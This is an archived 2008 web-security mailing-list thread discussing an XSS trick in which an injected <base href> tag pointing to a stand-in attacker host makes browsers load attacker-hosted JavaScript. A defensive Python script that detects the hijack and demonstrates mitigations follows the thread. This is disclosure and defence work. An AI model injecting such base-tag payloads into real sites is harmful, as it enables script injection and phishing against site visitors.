RE: [WEB SECURITY] Nice little XSS trick
- From: "Arshan Dabirsiaghi" <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
- Subject: RE: [WEB SECURITY] Nice little XSS trick
- Date: Thu, 17 Jul 2008 10:08:53 -0400
No offense at all intended, but blaming developers for not following the
spec is easy but in the end just not very useful. When the most common
usage deviates from the spec, looking back at the past doesn't help
much. Incidentally, expecting your everyday Joe Coder to code to spec
when he receives no formal education of the spec is a very bizarre
phenomenon IMHO.
Microsoft's improvement of IE7's base-related behavior will trickle down
though, (un)fortunately. Since IE7 won't process a <base> outside of
<head>, developers will be forced to alter their sites so that their IE7
users won't have a broken site. So for sites of any worth, this will now
be a very corner case exploit.
I even tried wrapping the <base> exploit inside an injected <head> and
some other things to see if I could trick it into processing it, but
alas, nothing. Maybe Gareth should fuzz it - these browsers are too
liberal and I would be surprised if it was 100% bulletproof in this
respect.
Arshan
-----Original Message-----
From: elspood@xxxxxxxxx [mailto:elspood@xxxxxxxxx] On Behalf Of James
Landis
Sent: Wednesday, July 16, 2008 4:36 PM
To: Arshan Dabirsiaghi
Cc: David Byrne; Amit Klein; websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Nice little XSS trick
It's almost impossible if the attacker can inject a BASE tag into the
HEAD.
It's easy if they, oh I dunno, FOLLOW THE SPEC.
-j
On Wed, Jul 16, 2008 at 12:32 PM, Arshan Dabirsiaghi
<arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
> Yeah, and a typical, unfortunate reaction from sirdarkcat (not typical
> of him, just of the security community in general). It's different
> because it'd be trivially easy for the browser vendors to prevent the
> javascript: technique, but almost impossible to fix this variant.
>
> Arshan
>
> -----Original Message-----
> From: David Byrne [mailto:davidribyrne@xxxxxxxxx]
> Sent: Wednesday, July 16, 2008 3:30 PM
> To: Arshan Dabirsiaghi; Amit Klein
> Cc: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> I need to indulge my vanity :) I posted something similar almost a year
> ago. Granted, I didn't take the time to write it up nicely.
>
> http://sla.ckers.org/forum/read.php?2,14751
>
> ----- Original Message ----
> From: Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
> To: Amit Klein <aksecurity@xxxxxxxxx>
> Cc: websecurity@xxxxxxxxxxxxx
> Sent: Wednesday, July 16, 2008 8:45:28 AM
> Subject: RE: [WEB SECURITY] Nice little XSS trick
>
> You're too nice - no need to apologize or defer credit. You discovered
> it on your own. If you can't find it in Google, CWE or the OWASP Testing
> Guide, I frankly don't think you can call it public knowledge, and
> therefore it should be publicly discussed.
>
> Arshan
>
> -----Original Message-----
> From: Amit Klein [mailto:aksecurity@xxxxxxxxx]
> Sent: Wednesday, July 16, 2008 10:34 AM
> To: Arshan Dabirsiaghi
> Cc: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> Hi Arshan+list,
>
> Indeed - the same vulnerability. I did google for it, but I didn't
> pick up your site (and RSnake's cheat sheet doesn't list it - now I
> know why).
>
> Anyway - sorry. You deserve full credit for it, of course.
>
> Thanks for the correction and the further information,
> -Amit
>
>
> On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
> wrote:
>>
>> http://i8jesus.com/?p=10 (Jan 2008)
>>
>> I also presented this vector last year at OWASP San Jose when I demo'ed
>> AntiSamy as an example of dangerous content that isn't malicious code on its
>> own. That's one of the selling points of AntiSamy - it stops not only XSS
>> (well, we hope) but also prevents phishing attacks that abuse HTML/CSS.
>>
>> I talked about it with RSnake afterwards and he had some crazy reason for
>> not putting it on his cheatsheet - claimed it was too much like the
>> <base href="javascript:foo();//"> vector. As noted on my blog post, IE7 is
>> no longer (according to policy) supposed to be honoring <base> tags outside
>> of <HEAD>, but FF is still vulnerable. You could use this to hijack anything -
>> stylesheets (more XSS/phishing), images, scripts, etc. The only thing <base>
>> won't help you steal as far as resources is anything gathered in JavaScript.
>>
>> I think some of the big players had this figured out already (or more
>> likely, just got really lucky). MySpace takes <base href> values, base64
>> encodes them, and redirects them through another domain. The flow is like
>> this for them:
>>
>> 1. User puts in <base href="http://evil.com">
>> 2. Str = base64("http://evil.com")
>> 3. Profile = <base href="http://msplinks.com/redir?<base64encodedStr>
>>
>> Maybe there's a way to abuse that, but I don't think so. And eBay doesn't
>> have any relative links after user content, at least when I first looked at
>> this last year. They probably both just got lucky. =]
>>
>> Arshan
>>
>> ---------- Previous message ----------
>> From: Amit Klein <aksecurity@xxxxxxxxx>
>> Date: Tue, Jul 15, 2008 at 7:33 AM
>> Subject: [WEB SECURITY] Nice little XSS trick
>> To: Web Security <websecurity@xxxxxxxxxxxxx>
>>
>> Hi list
>>
>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not on
>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>> BASE, but not the trick I describe here). The idea is to use the HTML BASE
>> tag to force loading of JS code from the attacker's host. Consider a page
>> with XSS vulnerability such as:
>>
>> <html>
>> ...
>> ***XSS code may be embedded here***
>> ...
>> <script src="/foo/bar.js"></script>
>> ...
>> </html>
>>
>> Now, an attacker can inject <base href="http://www.attacker.tld/">, and next
>> thing you know, the browser (IE, at least) loads the JS from
>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>> "explicit" JS code involved in the payload itself.
>>
>> Note that according to the HTML standard, BASE should be placed in the HEAD
>> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
>> This is indeed observed by FF 2, but not by IE (checked IE6).
>>
>> Thanks,
>> -Amit
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
Brought to you by http://www.webappsec.org
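As an added example, not code from the thread or from any of its participants, here is a small Python model of the behaviour Amit's original message describes: relative subresource references such as `/foo/bar.js` are resolved against whatever `<base href>` the browser honours, so an injected `<base>` redirects those fetches to another host. It also checks the two defences a site can apply on its own side: rejecting user-supplied HTML that carries a `<base>` element at all, and emitting the site's own `<base href>` first in `<head>`. The second defence assumes the HTML standard's rule that the first `<base href>` in document order sets the document base URL, which is the behaviour of standards-following browsers and not the IE6/IE7 behaviour discussed in the thread. The page URL, hostnames, file names and user fragment are constructed placeholders.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes that fetch subresources and therefore resolve against the document base URL.
SUBRESOURCE_ATTRS = {"script": "src", "img": "src", "link": "href", "iframe": "src"}


def origin(url):
    """(scheme, host, port) triple used to decide whether a fetch leaves the site."""
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port)


def is_relative(ref):
    """True for references like '/foo/bar.js' or 'logo.png' that depend on the base URL."""
    p = urlsplit(ref)
    return not p.scheme and not p.netloc


class _Auditor(HTMLParser):
    """Tokenises the document and resolves each subresource reference the way a
    browser would, honouring only the first <base href> (assumption, see lead-in)."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.base = None          # first <base href> seen, wherever it sits in the document
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base":
            if self.base is None and attrs.get("href"):
                self.base = urljoin(self.page_url, attrs["href"])
            return
        attr = SUBRESOURCE_ATTRS.get(tag)
        if attr and attrs.get(attr):
            raw = attrs[attr]
            resolved = urljoin(self.base or self.page_url, raw)
            self.findings.append({
                "tag": tag, "raw": raw, "resolved": resolved,
                # A relative reference that now points off-origin has been hijacked.
                "hijacked": is_relative(raw) and origin(resolved) != origin(self.page_url),
            })


def audit(document, page_url):
    """One finding per subresource reference, with the URL it would actually fetch."""
    a = _Auditor(page_url)
    a.feed(document)
    a.close()
    return a.findings


def hijacked_urls(document, page_url):
    return [f["resolved"] for f in audit(document, page_url) if f["hijacked"]]


class _BaseFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == "base":
            self.found = True


def contains_base(fragment):
    """Defence 1: reject user-supplied HTML outright if it carries a <base> element."""
    f = _BaseFinder()
    f.feed(fragment)
    f.close()
    return f.found


def pin_base(document, page_url):
    """Defence 2: emit the site's own <base href> first in <head>, so a <base>
    injected later in the document loses under the first-base-wins rule."""
    tag = '<base href="%s">' % escape(page_url, quote=True)
    return document.replace("<head>", "<head>" + tag, 1)


# Constructed sample, modelled on the page in Amit's message (hosts are placeholders).
PAGE_URL = "http://www.example.test/profile"
USER_CONTENT = '<b>hi</b><base href="http://www.attacker.tld/">'
TEMPLATE = ("<html><head><title>t</title></head><body>{user}"
            '<script src="/foo/bar.js"></script><img src="logo.png">'
            '<script src="//cdn.example.test/lib.js"></script></body></html>')


def demo():
    doc = TEMPLATE.format(user=USER_CONTENT)
    return {
        "unprotected": hijacked_urls(doc, PAGE_URL),                  # two fetches go off-site
        "rejected": contains_base(USER_CONTENT),                     # True: drop the fragment
        "pinned": hijacked_urls(pin_base(doc, PAGE_URL), PAGE_URL),  # [] once base is pinned
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The audit deliberately treats a protocol-relative or absolute reference (the `//cdn.example.test/lib.js` script) as not hijacked, since `<base>` does not affect it; only references with neither scheme nor host are exposed. Rejecting the fragment is the simpler defence and is what a sanitizer such as the one discussed in the thread would do; pinning the base is the belt-and-braces measure for the case where the injection happens somewhere the sanitizer never saw.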